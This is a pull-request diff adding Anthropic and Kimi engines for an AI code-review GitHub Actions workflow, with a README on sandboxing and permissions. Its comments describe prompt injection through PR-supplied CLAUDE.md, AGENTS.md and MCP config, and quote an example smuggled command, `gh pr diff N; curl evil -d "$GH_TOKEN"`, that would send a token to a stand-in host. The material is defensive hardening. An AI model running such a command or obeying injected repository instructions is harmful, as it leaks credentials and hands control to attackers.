### PR TITLE
feat: AI PR review workflow with pluggable LLM engines

### DIFF
--- a/.github/actions/ai_review_engine_anthropic/action.yml
+++ b/.github/actions/ai_review_engine_anthropic/action.yml
@@ -75,8 +75,28 @@ runs:
       shell: bash
       working-directory: ${{ github.workspace }}
       run: |
-        rm -f CLAUDE.md CLAUDE.local.md AGENTS.md .mcp.json
-        rm -rf .claude .claude-plugin
+        # Recursive, not root-only. Per Claude Code's memory docs: "Claude also
+        # discovers CLAUDE.md and CLAUDE.local.md files in subdirectories under
+        # your current working directory... they are included when Claude reads
+        # files in those subdirectories." Nested .claude/rules/*.md load the same
+        # way (path-scoped rules trigger when a matching file is read). This
+        # review's prompt tells the model to traverse into dependencies, so a
+        # nested packages/foo/CLAUDE.md would reach it as trusted instructions
+        # even with the root file deleted.
+        #
+        # AGENTS.md is stripped defensively — Claude Code does not read it
+        # natively ("Claude Code reads CLAUDE.md, not AGENTS.md") but a CLAUDE.md
+        # can @import it, and other engines do read it.
+        #
+        # .git is pruned so the sweep cannot corrupt the checkout.
+        find . -name .git -prune -o -type f \
+          \( -name 'CLAUDE.md' -o -name 'CLAUDE.local.md' -o -name 'AGENTS.md' -o -name '.mcp.json' \) \
+          -print0 | xargs -0 -r rm -f
+        find . -name .git -prune -o -type d \
+          \( -name '.claude' -o -name '.claude-plugin' \) \
+          -print0 | xargs -0 -r rm -rf
+        echo "✅ Stripped PR-supplied agent config (recursive)"
+
         # Persistent self-hosted runner: clear cross-run agent state too.
         rm -rf "$HOME/.claude"
         rm -f "$HOME/.claude.json"

--- a/.github/actions/ai_review_engine_anthropic/action.yml
+++ b/.github/actions/ai_review_engine_anthropic/action.yml
@@ -100,6 +100,9 @@ runs:
         echo "🔧 Anthropic engine | model=${{ inputs.model }} | base_url=$BASE_URL"
 
     - name: Claude Code PR review
+      # Not a release tag — this is the SHA claude-pr-review.yml was pinned to
+      # (2026-05-01, "bump Claude Code to 2.1.126"). Carried over unchanged so the
+      # engine behaves identically to the workflow it replaces.
       uses: anthropics/claude-code-action@fefa07e9c665b7320f08c3b525980457f22f58aa
       env:
         ANTHROPIC_BASE_URL: ${{ steps.resolve.outputs.base_url }}

--- a/.github/actions/ai_review_engine_anthropic/action.yml
+++ b/.github/actions/ai_review_engine_anthropic/action.yml
@@ -2,8 +2,9 @@ name: ai_review_engine_anthropic
 description: >
   AI PR review engine — Claude Code Action. Reads a pre-built review context and
   a pre-fetched PR diff, reviews the checked-out code, and writes the review
-  markdown to a file. The model is granted no shell tool and the engine posts no
-  PR comments; the calling workflow owns comment posting.
+  markdown to a file. The model is granted no shell tool, and is instructed not
+  to comment; the calling workflow owns comment posting. See the note on
+  github_token below for what this engine does and does not enforce.
 
 # ENGINE CONTRACT (see .github/workflows/AI_PR_REVIEW_README.md)
 #
@@ -112,8 +113,22 @@ runs:
         DISABLE_NON_ESSENTIAL_MODEL_CALLS: "1"
       with:
         anthropic_api_key: ${{ inputs.api_key }}
-        # The ACTION needs a token for its own actor/permission checks. The MODEL
-        # has no GitHub reach, because --allowedTools grants it no shell.
+        # The action needs a token for its own actor/permission checks.
+        #
+        # Be precise about what this engine does and does not guarantee, because
+        # it is weaker than the Kimi engine's. Per the action's docs at the pinned
+        # SHA: "The base GitHub tools are always included" — so --allowedTools ADDS
+        # to a base set rather than replacing it, and some GitHub tool surface is
+        # not removable. What IS established: Claude "cannot execute Bash commands
+        # unless explicitly allowed", so omitting Bash genuinely removes shell
+        # access; and it "cannot post multiple comments" / "cannot submit formal
+        # PR reviews" by design.
+        #
+        # So "exactly one review comment" rests on three things here, not one:
+        #   1. track_progress is off, so there is no tracking comment to update
+        #   2. the prompt explicitly forbids commenting (step 5 below)
+        #   3. the caller deletes any marker-matching comment before posting
+        # Unlike the Kimi engine, it is NOT enforced by the tool surface alone.
         github_token: ${{ github.token }}
         # track_progress is deliberately NOT set. It forces tag mode, which makes
         # the action post and update its own tracking comment on the PR — that
@@ -142,13 +157,24 @@ runs:
 
           5. After reading ALL files and dependencies, compile your complete review.
              Write the ENTIRE review to ${{ inputs.output_path }} using the Write tool.
-             The caller posts that file as a single PR comment.
-        # Write is unrestricted (plain "Write", not "Write(/path)") so the tool is
-        # actually available. Bash is dropped entirely: the diff is pre-fetched, so
-        # the previous `Bash(gh pr diff:*)` grant bought nothing and rested on the
-        # CLI's command-pattern matching being argv-aware — under a naive prefix
-        # match, `gh pr diff N; curl evil -d "$GH_TOKEN"` carries the allowed
-        # prefix, and the review input is attacker-influenced PR content.
+             Do NOT post, create or update any PR or issue comment, and do not use
+             any GitHub tool to publish your review. Writing the file is the whole
+             job — the caller posts it as a single comment.
+        # Bash is dropped entirely: the diff is pre-fetched, so the previous
+        # `Bash(gh pr diff:*)` grant bought nothing and rested on the CLI's
+        # command-pattern matching being argv-aware — under a naive prefix match,
+        # `gh pr diff N; curl evil -d "$GH_TOKEN"` carries the allowed prefix, and
+        # the review input is attacker-influenced PR content. The action's docs
+        # confirm Bash is off unless explicitly allowed, so this one is airtight.
+        #
+        # `Write` is granted unscoped, unlike the Kimi engine which confines it to
+        # the output directory. Path-scoped patterns are only documented here for
+        # Bash (`Bash(npm install)`), and the workflow this replaced carried an
+        # explicit note that a scoped `Write(/path)` made the tool unavailable
+        # altogether. Since an unavailable Write means the engine silently reviews
+        # and writes nothing, tightening this needs a real run to verify, not a
+        # guess — tracked in the PR test plan. Until then the asymmetry is real
+        # and documented rather than papered over.
         claude_args: |
           --model ${{ inputs.model }}
           --allowedTools "Read,Write"

--- a/.github/actions/ai_review_engine_anthropic/action.yml
+++ b/.github/actions/ai_review_engine_anthropic/action.yml
@@ -1,0 +1,167 @@
+name: ai_review_engine_anthropic
+description: >
+  AI PR review engine — Claude Code Action. Reads a pre-built review context and
+  a pre-fetched PR diff, reviews the checked-out code, and writes the review
+  markdown to a file. The model is granted no shell tool and the engine posts no
+  PR comments; the calling workflow owns comment posting.
+
+# ENGINE CONTRACT (see .github/workflows/AI_PR_REVIEW_README.md)
+#
+# The caller guarantees: PR head is checked out; review_context_path and
+# pr_diff_path exist and are non-empty; the access gate has passed.
+#
+# This engine must: strip PR-supplied agent config FIRST, grant the model no
+# shell tool, write the review to output_path, and fail with an engine-named
+# message if it wrote nothing. It must not post PR comments or reach the GitHub
+# API on the model's behalf.
+#
+# Composite-action gotchas that constrain this file:
+#   - `secrets` is not readable here, so api_key arrives as an input.
+#     `github.token` IS reachable (precedent: post_preview_build_comment).
+#   - `timeout-minutes` is invalid on the steps below; the caller's dispatch
+#     step carries it.
+#   - `uses:` takes no expressions, so the claude-code-action SHA is pinned
+#     literally below and bumped by PR. This is the same governance as the Kimi
+#     engine's `cli_version` input, enforced by a different mechanism.
+
+inputs:
+  review_context_path:
+    description: "Path to the pre-built review context markdown (instructions, PR metadata, previous review, acknowledged suggestions, required output format). Built by the caller."
+    required: false
+    default: "/tmp/review_context.md"
+  pr_diff_path:
+    description: "Path to the pre-fetched PR diff. Fetched by the caller with the trusted token so this engine needs no shell tool."
+    required: false
+    default: "/tmp/pr_diff.txt"
+  output_path:
+    description: "Path this engine MUST write the final review markdown to."
+    required: false
+    default: "/tmp/ai_review_output.txt"
+  repository:
+    description: "owner/repo of the PR under review (prompt preamble only)."
+    required: true
+  pr_number:
+    description: "Number of the PR under review (prompt preamble only)."
+    required: true
+  model:
+    description: "Claude model ID, e.g. claude-sonnet-5. Passed via claude_args --model (the action's `model` input was removed upstream)."
+    required: false
+    default: "claude-sonnet-5"
+  base_url:
+    description: "LLM API base URL. A trailing /v1 is REMOVED before use — the Anthropic SDK appends /v1/messages itself. Accepting it and stripping means one caller-facing value works for every engine, so flipping `engine` never silently 404s."
+    required: false
+    default: "https://litellmsa.deriv.ai/v1"
+  api_key:
+    description: "API key for base_url (a LiteLLM virtual key with the default base_url). Composite actions cannot read the `secrets` context, so the caller must pass this explicitly."
+    required: true
+
+outputs:
+  output_path:
+    description: "Path the review markdown was written to."
+    value: ${{ steps.verify.outputs.output_path }}
+
+runs:
+  using: composite
+  steps:
+    # Security boundary, not hygiene — and broader than the file this engine was
+    # extracted from, which stripped only CLAUDE.md. Claude Code reads CLAUDE.md,
+    # CLAUDE.local.md and AGENTS.md as instructions; .claude/settings.json can
+    # declare HOOKS that execute arbitrary commands; .mcp.json can declare MCP
+    # servers; .claude-plugin is a plugin manifest. None of those are gated by
+    # the --allowedTools allowlist below, and all of them are PR-controlled.
+    # These paths are engine-specific: another engine must revisit this list.
+    - name: Strip PR-supplied agent config (Claude Code)
+      shell: bash
+      working-directory: ${{ github.workspace }}
+      run: |
+        rm -f CLAUDE.md CLAUDE.local.md AGENTS.md .mcp.json
+        rm -rf .claude .claude-plugin
+        # Persistent self-hosted runner: clear cross-run agent state too.
+        rm -rf "$HOME/.claude"
+        rm -f "$HOME/.claude.json"
+
+    - name: Resolve base URL and verify inputs
+      id: resolve
+      shell: bash
+      env:
+        INPUT_BASE_URL: ${{ inputs.base_url }}
+        CONTEXT_PATH: ${{ inputs.review_context_path }}
+        DIFF_PATH: ${{ inputs.pr_diff_path }}
+      run: |
+        [[ -s "$CONTEXT_PATH" ]] || { echo "❌ Anthropic engine: missing or empty review context at $CONTEXT_PATH"; exit 1; }
+        [[ -s "$DIFF_PATH"    ]] || { echo "❌ Anthropic engine: missing or empty PR diff at $DIFF_PATH"; exit 1; }
+
+        # ANTHROPIC_BASE_URL must NOT carry /v1 — the SDK appends /v1/messages.
+        # Emitted as a step OUTPUT rather than via $GITHUB_ENV, because env
+        # written inside a composite action leaks into the caller's later steps.
+        BASE_URL="${INPUT_BASE_URL%/}"
+        BASE_URL="${BASE_URL%/v1}"
+        echo "base_url=$BASE_URL" >> "$GITHUB_OUTPUT"
+        echo "🔧 Anthropic engine | model=${{ inputs.model }} | base_url=$BASE_URL"
+
+    - name: Claude Code PR review
+      uses: anthropics/claude-code-action@fefa07e9c665b7320f08c3b525980457f22f58aa
+      env:
+        ANTHROPIC_BASE_URL: ${{ steps.resolve.outputs.base_url }}
+        ANTHROPIC_AUTH_TOKEN: ${{ inputs.api_key }}
+        CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC: "1"
+        CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS: "1"
+        DISABLE_NON_ESSENTIAL_MODEL_CALLS: "1"
+      with:
+        anthropic_api_key: ${{ inputs.api_key }}
+        # The ACTION needs a token for its own actor/permission checks. The MODEL
+        # has no GitHub reach, because --allowedTools grants it no shell.
+        github_token: ${{ github.token }}
+        # track_progress is deliberately NOT set. It forces tag mode, which makes
+        # the action post and update its own tracking comment on the PR — that
+        # would break this engine's "posts no comments" contract, and the caller's
+        # cleanup step only reaps comments carrying the review marker, so tracking
+        # comments would accumulate on every PR forever.
+        show_full_output: true
+        prompt: |
+          REPO: ${{ inputs.repository }}
+          PR NUMBER: ${{ inputs.pr_number }}
+
+          Follow these steps:
+
+          1. Read ${{ inputs.review_context_path }} — it contains full review instructions, PR context, previous review (if any), acknowledged suggestions to skip, and the required output format.
+
+          2. Read ${{ inputs.pr_diff_path }} — it contains the full diff for this PR (changed files and hunks), already fetched for you. You have no shell tool; everything you need is on disk.
+
+          3. For each changed file, use Read to open the full file — not just the diff hunk.
+             Full file context is required to understand the complete impact of each change.
+
+          4. For each changed file, identify and Read its dependencies:
+             - Imported modules, utilities, or shared helpers referenced in the changed code
+             - Type definitions, interfaces, or enums used by the changed code
+             - Parent components or callers if the changed file exports something modified
+             - Related test files (e.g. *.spec.ts, *.test.ts) to assess coverage gaps
+
+          5. After reading ALL files and dependencies, compile your complete review.
+             Write the ENTIRE review to ${{ inputs.output_path }} using the Write tool.
+             The caller posts that file as a single PR comment.
+        # Write is unrestricted (plain "Write", not "Write(/path)") so the tool is
+        # actually available. Bash is dropped entirely: the diff is pre-fetched, so
+        # the previous `Bash(gh pr diff:*)` grant bought nothing and rested on the
+        # CLI's command-pattern matching being argv-aware — under a naive prefix
+        # match, `gh pr diff N; curl evil -d "$GH_TOKEN"` carries the allowed
+        # prefix, and the review input is attacker-influenced PR content.
+        claude_args: |
+          --model ${{ inputs.model }}
+          --allowedTools "Read,Write"
+
+    - name: Verify review output
+      id: verify
+      shell: bash
+      env:
+        OUTPUT_PATH: ${{ inputs.output_path }}
+      run: |
+        # Fail here, named, rather than letting the caller report a generic
+        # "review file missing" — all steps in a composite action share one log
+        # group, so an engine-attributed error is what makes this locatable.
+        if [[ ! -s "$OUTPUT_PATH" ]]; then
+          echo "❌ Anthropic engine: claude-code-action finished but wrote no review to $OUTPUT_PATH"
+          exit 1
+        fi
+        echo "✅ Anthropic engine: review written ($(wc -c < "$OUTPUT_PATH") bytes)"
+        echo "output_path=$OUTPUT_PATH" >> "$GITHUB_OUTPUT"

--- a/.github/actions/ai_review_engine_kimi/action.yml
+++ b/.github/actions/ai_review_engine_kimi/action.yml
@@ -89,7 +89,10 @@ runs:
         rm -rf .kimi-code
 
     - name: Set up Node.js
-      uses: actions/setup-node@v4
+      # Pinned to a commit SHA, not a tag: tags are mutable, so `@v4` would let a
+      # retagged release execute in a job holding the LLM API key and a
+      # write-scoped GITHUB_TOKEN. Bump deliberately via PR.
+      uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
       with:
         node-version: ${{ inputs.node_version }}
 

--- a/.github/actions/ai_review_engine_kimi/action.yml
+++ b/.github/actions/ai_review_engine_kimi/action.yml
@@ -85,8 +85,17 @@ runs:
       shell: bash
       working-directory: ${{ github.workspace }}
       run: |
-        rm -f CLAUDE.md AGENTS.md KIMI.md
-        rm -rf .kimi-code
+        # Recursive, not root-only. Instruction files are discovered per-directory
+        # as an agent reads files there, and this review's prompt explicitly tells
+        # it to traverse into dependencies — so a nested packages/foo/CLAUDE.md
+        # would reach the model as trusted instructions even with the root file
+        # deleted. .git is pruned so the sweep cannot corrupt the checkout.
+        find . -name .git -prune -o -type f \
+          \( -name 'CLAUDE.md' -o -name 'CLAUDE.local.md' -o -name 'AGENTS.md' -o -name 'KIMI.md' \) \
+          -print0 | xargs -0 -r rm -f
+        find . -name .git -prune -o -type d -name '.kimi-code' \
+          -print0 | xargs -0 -r rm -rf
+        echo "✅ Stripped PR-supplied agent config (recursive)"
 
     - name: Set up Node.js
       # Pinned to a commit SHA, not a tag: tags are mutable, so `@v4` would let a

--- a/.github/actions/ai_review_engine_kimi/action.yml
+++ b/.github/actions/ai_review_engine_kimi/action.yml
@@ -1,0 +1,215 @@
+name: ai_review_engine_kimi
+description: >
+  AI PR review engine — Kimi Code CLI. Reads a pre-built review context and a
+  pre-fetched PR diff, reviews the checked-out code, and writes the review
+  markdown to a file. It posts nothing: it is given no GitHub token and no shell
+  tool. The calling workflow owns comment posting.
+
+# ENGINE CONTRACT (see .github/workflows/AI_PR_REVIEW_README.md)
+#
+# The caller guarantees: PR head is checked out; review_context_path and
+# pr_diff_path exist and are non-empty; the access gate has passed.
+#
+# This engine must: strip PR-supplied agent config FIRST, grant the model no
+# shell tool, write the review to output_path, and fail with an engine-named
+# message if it wrote nothing. It must not post PR comments or reach the GitHub
+# API on the model's behalf.
+#
+# Composite-action gotchas that constrain this file:
+#   - `secrets` is not readable here, so api_key arrives as an input.
+#   - `timeout-minutes` is invalid on the steps below; the caller's dispatch
+#     step carries it.
+#   - All steps share one log group, so failures must name this engine.
+
+inputs:
+  review_context_path:
+    description: "Path to the pre-built review context markdown (instructions, PR metadata, previous review, acknowledged suggestions, required output format). Built by the caller."
+    required: false
+    default: "/tmp/review_context.md"
+  pr_diff_path:
+    description: "Path to the pre-fetched PR diff. Fetched by the caller with the trusted token so this engine needs neither a shell tool nor network access."
+    required: false
+    default: "/tmp/pr_diff.txt"
+  output_path:
+    description: "Path this engine MUST write the final review markdown to. Its parent directory is the only location the CLI is permitted to write."
+    required: false
+    default: "/tmp/ai_review_output.txt"
+  repository:
+    description: "owner/repo of the PR under review (prompt preamble only)."
+    required: true
+  pr_number:
+    description: "Number of the PR under review (prompt preamble only)."
+    required: true
+  model:
+    description: "Model ID — k3, k3-256k, kimi-for-coding, kimi-for-coding-highspeed, or any model the LiteLLM proxy fronts. Maps to KIMI_MODEL_NAME."
+    required: false
+    default: "k3"
+  base_url:
+    description: "LLM API base URL. A trailing /v1 is appended when absent, so the identical value also works for the anthropic engine (which needs it removed). Maps to KIMI_MODEL_BASE_URL."
+    required: false
+    default: "https://litellmsa.deriv.ai/v1"
+  api_key:
+    description: "API key for base_url. Composite actions cannot read the `secrets` context, so the caller must pass this explicitly. Maps to KIMI_MODEL_API_KEY and is never written to disk."
+    required: true
+  max_context_size:
+    description: "Maximum context window in tokens (k3 = 1048576, k3-256k / kimi-for-coding = 262144). Must match the selected model, or the CLI over-packs context and the API rejects the request. Maps to KIMI_MODEL_MAX_CONTEXT_SIZE."
+    required: false
+    default: "1048576"
+  provider_type:
+    description: "Provider dialect for the Kimi CLI. Maps to KIMI_MODEL_PROVIDER_TYPE."
+    required: false
+    default: "kimi"
+  cli_version:
+    description: "Exact @moonshot-ai/kimi-code version to install. Pinned deliberately — the package is pre-1.0 and ships minor releases weekly, so `latest` risks both breaking changes and unreviewed code in a privileged job. Bump via PR."
+    required: false
+    default: "0.34.0"
+  node_version:
+    description: "Node.js version used to install and run the CLI."
+    required: false
+    default: "22"
+
+outputs:
+  output_path:
+    description: "Path the review markdown was written to."
+    value: ${{ steps.run.outputs.output_path }}
+
+runs:
+  using: composite
+  steps:
+    # Security boundary, not hygiene. Instruction files are a prompt-injection
+    # vector, and project-level .kimi-code/mcp.json can declare MCP servers —
+    # arbitrary local commands, NOT gated by the Bash deny rule below — while
+    # local.toml can widen workspace access. These paths are engine-specific:
+    # another engine must revisit this list, never inherit it.
+    - name: Strip PR-supplied agent config (Kimi Code)
+      shell: bash
+      working-directory: ${{ github.workspace }}
+      run: |
+        rm -f CLAUDE.md AGENTS.md KIMI.md
+        rm -rf .kimi-code
+
+    - name: Set up Node.js
+      uses: actions/setup-node@v4
+      with:
+        node-version: ${{ inputs.node_version }}
+
+    - name: Install review CLI (Kimi Code)
+      shell: bash
+      env:
+        CLI_VERSION: ${{ inputs.cli_version }}
+      run: |
+        npm install -g "@moonshot-ai/kimi-code@${CLI_VERSION}"
+        kimi --version
+
+    - name: Configure review CLI (Kimi Code)
+      shell: bash
+      env:
+        OUTPUT_PATH: ${{ inputs.output_path }}
+      run: |
+        # Model and credentials are supplied entirely through the KIMI_MODEL_*
+        # env channel on the run step — nothing sensitive is written to disk.
+        # This file only restricts the tool surface: Read, Write (output dir
+        # only), Grep, Glob. No Bash. The diff is pre-fetched, so the agent has
+        # no reason to run commands.
+        #
+        # Rules are first-match-wins and evaluated before the mode default, so
+        # each `allow` must precede its `deny` catch-all. Bash is absent from
+        # `enabled` AND denied by rule, so neither control has to be correct on
+        # its own.
+        #
+        # $HOME/.kimi-code is recreated rather than merged: on a persistent
+        # self-hosted runner a previous run's config could otherwise survive
+        # (e.g. a leftover mcp.json, which `cat > config.toml` would not remove).
+        OUT_DIR="$(dirname "$OUTPUT_PATH")"
+        rm -rf "$HOME/.kimi-code"
+        mkdir -p "$HOME/.kimi-code"
+
+        cat > "$HOME/.kimi-code/config.toml" <<EOF
+        default_permission_mode = "auto"
+
+        [tools]
+        enabled = ["Read", "Write", "Grep", "Glob"]
+
+        [[permission.rules]]
+        decision = "allow"
+        pattern = "Write(${OUT_DIR}/*)"
+
+        [[permission.rules]]
+        decision = "deny"
+        pattern = "Write"
+
+        [[permission.rules]]
+        decision = "deny"
+        pattern = "Bash"
+        EOF
+
+        kimi doctor config
+
+    - name: Run AI PR review (Kimi Code)
+      id: run
+      shell: bash
+      working-directory: ${{ github.workspace }}
+      env:
+        KIMI_MODEL_NAME: ${{ inputs.model }}
+        KIMI_MODEL_API_KEY: ${{ inputs.api_key }}
+        KIMI_MODEL_MAX_CONTEXT_SIZE: ${{ inputs.max_context_size }}
+        KIMI_MODEL_PROVIDER_TYPE: ${{ inputs.provider_type }}
+        KIMI_DISABLE_TELEMETRY: "1"
+        KIMI_CODE_NO_AUTO_UPDATE: "1"
+        CI: "1"
+        INPUT_BASE_URL: ${{ inputs.base_url }}
+        CONTEXT_PATH: ${{ inputs.review_context_path }}
+        DIFF_PATH: ${{ inputs.pr_diff_path }}
+        OUTPUT_PATH: ${{ inputs.output_path }}
+      run: |
+        [[ -s "$CONTEXT_PATH" ]] || { echo "❌ Kimi engine: missing or empty review context at $CONTEXT_PATH"; exit 1; }
+        [[ -s "$DIFF_PATH"    ]] || { echo "❌ Kimi engine: missing or empty PR diff at $DIFF_PATH"; exit 1; }
+
+        # base_url is accepted with or without a trailing /v1 so one caller-facing
+        # value works for every engine. The anthropic engine strips it instead.
+        BASE_URL="${INPUT_BASE_URL%/}"
+        [[ "$BASE_URL" == */v1 ]] || BASE_URL="${BASE_URL}/v1"
+        export KIMI_MODEL_BASE_URL="$BASE_URL"
+        echo "🔧 Kimi engine | model=$KIMI_MODEL_NAME | base_url=$BASE_URL"
+
+        # Quoted heredoc: the ${{ }} expressions below are substituted by Actions
+        # before bash sees this script, so no shell expansion happens in the
+        # prompt body.
+        cat > /tmp/review_prompt.txt <<'EOF'
+        REPO: ${{ inputs.repository }}
+        PR NUMBER: ${{ inputs.pr_number }}
+
+        Follow these steps:
+
+        1. Read ${{ inputs.review_context_path }} — it contains full review instructions, PR context, previous review (if any), acknowledged suggestions to skip, and the required output format.
+
+        2. Read ${{ inputs.pr_diff_path }} — it contains the full diff for this PR (changed files and hunks), already fetched for you. You have no shell tool; everything you need is on disk.
+
+        3. For each changed file, use Read to open the full file — not just the diff hunk.
+           Full file context is required to understand the complete impact of each change.
+
+        4. For each changed file, identify and Read its dependencies:
+           - Imported modules, utilities, or shared helpers referenced in the changed code
+           - Type definitions, interfaces, or enums used by the changed code
+           - Parent components or callers if the changed file exports something modified
+           - Related test files (e.g. *.spec.ts, *.test.ts) to assess coverage gaps
+
+        5. After reading ALL files and dependencies, compile your complete review.
+           Write the ENTIRE review to ${{ inputs.output_path }} using the Write tool.
+           The caller posts that file as a single PR comment.
+        EOF
+
+        # No GitHub token in this step's env and no Bash tool in the config: the
+        # agent cannot reach the GitHub API at all. The caller's post step is the
+        # only thing that can comment on the PR.
+        kimi -p "$(cat /tmp/review_prompt.txt)"
+
+        # Fail here, named, rather than letting the caller report a generic
+        # "review file missing" — all steps in a composite action share one log
+        # group, so an engine-attributed error is what makes this locatable.
+        if [[ ! -s "$OUTPUT_PATH" ]]; then
+          echo "❌ Kimi engine: the CLI finished but wrote no review to $OUTPUT_PATH"
+          exit 1
+        fi
+        echo "✅ Kimi engine: review written ($(wc -c < "$OUTPUT_PATH") bytes)"
+        echo "output_path=$OUTPUT_PATH" >> "$GITHUB_OUTPUT"

--- a/.github/workflows/AI_PR_REVIEW_README.md
+++ b/.github/workflows/AI_PR_REVIEW_README.md
@@ -63,8 +63,9 @@ from `claude-pr-review.yml` that omits it would silently switch LLM vendor.
 | Runtime | `@moonshot-ai/kimi-code` CLI (npm, pinned) | `anthropics/claude-code-action` (pinned by SHA) |
 | Default model | `k3` | `claude-sonnet-5` |
 | `base_url` sent | proxy origin **+ `/v1`** | proxy origin, **`/v1` stripped** |
-| Tools granted | `Read`, `Write`, `Grep`, `Glob` | `Read`, `Write` |
+| Tools granted | `Read`, `Write`, `Grep`, `Glob` | `Read`, `Write` **+ the action's base GitHub tools** |
 | Shell | none (absent from `enabled` **and** denied by rule) | none (`--allowedTools` omits Bash) |
+| `Write` scope | output directory only (allow + catch-all deny) | **unscoped** — see below |
 | Config stripped | `CLAUDE.md`, `AGENTS.md`, `KIMI.md`, `.kimi-code/` | `CLAUDE.md`, `CLAUDE.local.md`, `AGENTS.md`, `.mcp.json`, `.claude/`, `.claude-plugin/` |
 | Applicable inputs | all, incl. `max_context_size`, `cli_version` | all except `max_context_size`, `cli_version` |
 | `agent` reported | `ai_review` | `claude_review` |
@@ -76,6 +77,30 @@ receive one. Each engine normalises the value it is given, so the same
 `base_url` works across engines and flipping `engine` never silently 404s. Do
 not "fix" this by giving the dispatch per-engine defaults — that would make one
 input value mean two different things.
+
+**The two engines are not equally sandboxed.** Be precise about this rather than
+assuming parity:
+
+- **Kimi** — the tool surface *is* the guarantee. Bash is absent from `enabled`
+  and denied by rule; `Write` is confined to the output directory by an allow rule
+  plus a catch-all deny; no GitHub token reaches the step at all. The agent
+  cannot comment because it has no means to.
+- **Anthropic** — weaker, in two ways. `--allowedTools` **adds to** a base set
+  rather than replacing it (the action's docs: *"The base GitHub tools are always
+  included"*), so some GitHub tool surface is not removable and the action does
+  hold a token for its own actor checks. And `Write` is unscoped, because
+  path-scoped patterns are only documented for `Bash`, and the workflow this
+  replaced recorded that a scoped `Write(/path)` made the tool unavailable
+  entirely. Shell access *is* definitively gone — the docs confirm Bash is off
+  unless explicitly allowed.
+
+  So on this engine "exactly one review comment" rests on three things: no
+  tracking comment (`track_progress` is off), an explicit prompt instruction not
+  to comment, and the caller deleting marker-matching comments before posting.
+
+Tightening the Anthropic `Write` grant needs a verification run, since an
+unavailable `Write` means the engine reviews and writes nothing. Do not
+"fix" it blind.
 
 **A model swap is config; an engine swap is a rewrite.** Any model the LiteLLM
 proxy fronts can be reached by setting `model` (and `max_context_size` on Kimi).
@@ -117,15 +142,34 @@ is already a LiteLLM virtual key.
 
 ## Permissions
 
-`actions: write` is currently declared but believed unnecessary — `git blame`
-shows it was escalated from `read` alongside an `upload-artifact` change, and
-`upload-artifact` authenticates with `ACTIONS_RUNTIME_TOKEN` rather than this
-token. It is retained only so no existing consumer breaks mid-migration. When
-removing it: **drop it from this workflow first, then from the callers.** The
-reverse order fails every run, because a caller granting less than the called
-workflow declares is rejected outright.
+This workflow does **not** request `actions:` at all. `claude-pr-review.yml`
+granted `actions: write`, but `git blame` shows it was escalated from `read`
+alongside an `upload-artifact` change, and `upload-artifact` authenticates with
+`ACTIONS_RUNTIME_TOKEN` rather than this token. Neither engine calls the Actions
+API.
 
-`id-token: write` also appears unused and is a candidate for the same treatment.
+Callers may keep granting it harmlessly: **permissions can only be reduced, never
+elevated, down a reusable-workflow chain**, so declaring less than a caller grants
+always works. The reverse does not — a called workflow requesting *more* than its
+caller granted fails the run outright. That asymmetry is why the caller stubs in
+the migration guide keep their existing `permissions` block unchanged.
+
+`id-token: write` also appears unused by both engines and is a candidate for the
+same trim, pending a check that the self-hosted runner group does not rely on it.
+
+## Known limitations
+
+**Engine actions are referenced at `@master`, not a pinned SHA.** Every other
+third-party ref in this workflow is SHA-pinned, so this is a deliberate
+exception, for two reasons: a SHA cannot be referenced before the commit that
+introduces it exists, and pinning would make every engine change a two-commit
+dance (change, then re-pin). It also matches house style — `docsync-ai.yml` does
+the same for its composite actions.
+
+The consequence worth knowing: a consumer pinning `ai-pr-review.yml` to a tag or
+SHA does **not** pin the engine code that actually executes. Given how privileged
+this job is, pinning the engine refs — across this repo's self-referencing
+composite actions consistently, not just here — is a reasonable follow-up.
 
 ## Comment markers and cleanup
 

--- a/.github/workflows/AI_PR_REVIEW_README.md
+++ b/.github/workflows/AI_PR_REVIEW_README.md
@@ -1,0 +1,264 @@
+<pre style="color: #223f99; font-family: monospace;">
+╔══════════════════════════════════════════════════════════════════════════════════════════╗
+║        _    ___   ____  ____    ____            _                                        ║
+║       / \  |_ _| |  _ \|  _ \  |  _ \ _____   _(_) _____      __                         ║
+║      / _ \  | |  | |_) | |_) | | |_) / _ \ \ / / |/ _ \ \ /\ / /                          ║
+║     / ___ \ | |  |  __/|  _ <  |  _ <  __/\ V /| |  __/\ V  V /                           ║
+║    /_/   \_\___| |_|   |_| \_\ |_| \_\___| \_/ |_|\___| \_/\_/                            ║
+║                                                                                          ║
+╚══════════════════════════════════════════════════════════════════════════════════════════╝
+</pre>
+
+A reusable GitHub Actions workflow that reviews pull requests with an LLM. The
+engine is pluggable: pick `kimi` or `anthropic` with one input.
+
+## Features
+
+- 🤖 Full-context review — reads changed files whole, plus their imports, types, callers and tests
+- 🔄 Follow-up mode — on re-push, feeds the previous review plus an incremental diff so fixed items are not re-reported
+- 🧹 Exactly one review comment per PR, ever — old ones are captured and deleted first
+- 🔌 Pluggable engine (`kimi` | `anthropic`), each a composite action with its own CLI and sandbox
+- 🔒 The model gets **no shell tool** and no GitHub token — it cannot comment, and PR-supplied agent config is stripped before it starts
+- ✅ Respects `Click2Fix - Acknowledge` comments — acknowledged suggestions are never raised again
+- 📊 Emits events to the OneAboveAll metrics dashboard, and always to the job summary
+
+## Usage
+
+```yaml
+name: AI PR Review
+
+on:
+  pull_request_target:
+    types: [opened, synchronize, reopened, ready_for_review]
+
+jobs:
+  ai-review:
+    uses: deriv-com/shared-actions/.github/workflows/ai-pr-review.yml@master
+    permissions:
+      contents: read
+      pull-requests: write
+      issues: write
+      id-token: write
+      actions: write
+    with:
+      engine: kimi          # or: anthropic
+    secrets:
+      LLM_API_KEY: ${{ secrets.LLM_API_KEY }}
+      AGENT_METRICS_API_URL: ${{ secrets.AGENT_METRICS_API_URL }}
+      AGENT_METRICS_API_KEY: ${{ secrets.AGENT_METRICS_API_KEY }}
+```
+
+Every consumer in this org pins `@master`, so that is the documented policy —
+changes are live on merge. The `permissions` block is not optional: a reusable
+workflow may not request more scopes than its caller grants, so a caller
+granting less than the list above fails the run outright.
+
+**Always set `engine` explicitly.** The default is `kimi`, so a repo migrating
+from `claude-pr-review.yml` that omits it would silently switch LLM vendor.
+
+## Engines
+
+| | `kimi` | `anthropic` |
+|---|---|---|
+| Runtime | `@moonshot-ai/kimi-code` CLI (npm, pinned) | `anthropics/claude-code-action` (pinned by SHA) |
+| Default model | `k3` | `claude-sonnet-5` |
